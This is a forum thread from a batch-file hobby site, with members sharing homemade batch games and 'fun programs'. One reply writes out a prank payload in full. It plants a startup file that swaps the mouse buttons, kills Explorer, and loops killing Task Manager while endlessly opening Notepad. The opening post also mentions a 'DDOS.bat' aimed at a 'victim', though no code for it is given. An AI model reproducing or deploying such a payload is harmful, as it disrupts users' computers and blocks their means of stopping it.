Best of batch files :)

[HUNON]
11 years ago | edited 11 years ago

0

As you probably know right now,
I am Crazy about Batch Files, I simply cannot explain why.
[Maybe their easy to understand language and typical DOS style (so sexy >.>)]

Let’s have a discussion of Batch files [that you have seen or created]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Current batch files i created from my own source code, if you wish to use them ;] credit please;]

###########################################

Artificial-Intelligence
[A small ‘Chat Bot’ that prompts the user a name to start with, and then the Chat begins! with its simple replies and personal emotion it can be a time waster when you’re bored… completely ]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
BankRoll,
[you just got back from prison and you are once again part of the Russian mafia, buy houses and estates and rule against the bots that want to attack you on every corner]
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
SurvivalGame.bat
[prompts the player for a name and then you are left with a few items and a weapon with some gold,
upgrade your weapons and armor to fight off goblins and other creatures that hide in the Forest.]
[sell, or buy items in different shops from the different cities you can visit, even build a city!]
[Not enough? don’t worry you can even build a kingdom, and RAGE war against 6 different kingdoms!]
NOTE: This game is my best and longest coded game, took about a week to understand what i wanted and how i wanted to finish…wait… i am not finished yet ;]

EXTRA NOTE : Game is 27KB, and has 1187 lines of code

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
HackWare.bat
[You are a hacker and need to hack different accounts using challenging emails, messages as clues to passwords!]
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DDOS.bat
[ just a fun automated batch file that lets me type in a victim and let the File itself complete it’s mission;] ]
NOTE:
Only used for testing.

So i have told you a few of my favorite batch files,
what are your favorites, which one of mine is best?

Any questions ?

need help creating an awesome game through batch?

message me here! or comment !

16replies
8voices
319views
J [ColdIV]
11 years ago | edited 11 years ago

0

Well to know which of yours is the best I would have to test them.

I just made Tic Tac Toe to test Batch and some ‘Fun Programs’ when I was bored in school.
Here’s one of them:
echo [@echo](/profile/echo) off > "%userprofile%\STARTM~1\Programs\Startup\av.bat" echo Rundll32 user32, SwapMouseButton >> "%userprofile%\STARTM~1\Programs\Startup\av.bat" echo taskkill -f -im explorer.exe >> "%userprofile%\STARTM~1\Programs\Startup\av.bat" echo :loop >> "%userprofile%\STARTM~1\Programs\Startup\av.bat" echo taskkill -f -im taskmgr.exe>> "%userprofile%\STARTM~1\Programs\Startup\av.bat" echo start notepad.exe >> "%userprofile%\STARTM~1\Programs\Startup\av.bat" echo goto loop >> "%userprofile%\STARTM~1\Programs\Startup\av.bat"

Also I tried some colored output in Batch files.
So just random stuff you do when you’re bored and the school PC is too bad for other programs..

EDIT: Since someone used this without knowing what it does.. It creates a Batch file in your Startup which will end the task “explorer.exe” once and the “taskmgr.exe” in an endless loop. Also it will start the notepad in an endless loop.
You can delete the file with:
del "%userprofile%\STARTM~1\Programs\Startup\av.bat"


0

@hunon can you give your batch file or send to me , really like to try :)

EEEEE
11 years ago

0

wow i want that game too :)))))


0

me want that first …. hahahaha looks very cool that batch game :)

EEEEE
11 years ago

0

i see mattempik wants to be the first to test your game


0

hahaha yeah , really want to try the game :)

[HUNON]
11 years ago

0

ok ok, so i send it in message or here?

???Roun512 [roun512]
11 years ago

0

here better maybe we can try it too :D

[HUNON]
11 years ago

0

find any flaws?
message me


0

credit to HUNON . just add it in the code hahha

Skater [ira1997]
11 years ago

0

I need that game <3

Gninja
11 years ago

0

very nice indeed :)

[HUNON]
11 years ago

0

thank you verymuchGninja

? [stefanking56]
11 years ago

0

Whats wrong with your link HUNON, i think it has been removed.

[HUNON]
11 years ago

0

It was most likely removed due to inactivity.

I haven’t been in the game as much anymore, I was having serious PTSD issues, and I haven’t done hacking or testing for a while.
I’m also left behind ;) but my website it still working (my main one)
Http://firesidescotty.tk

You must be logged in to reply to this discussion. Login
1 of 17

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss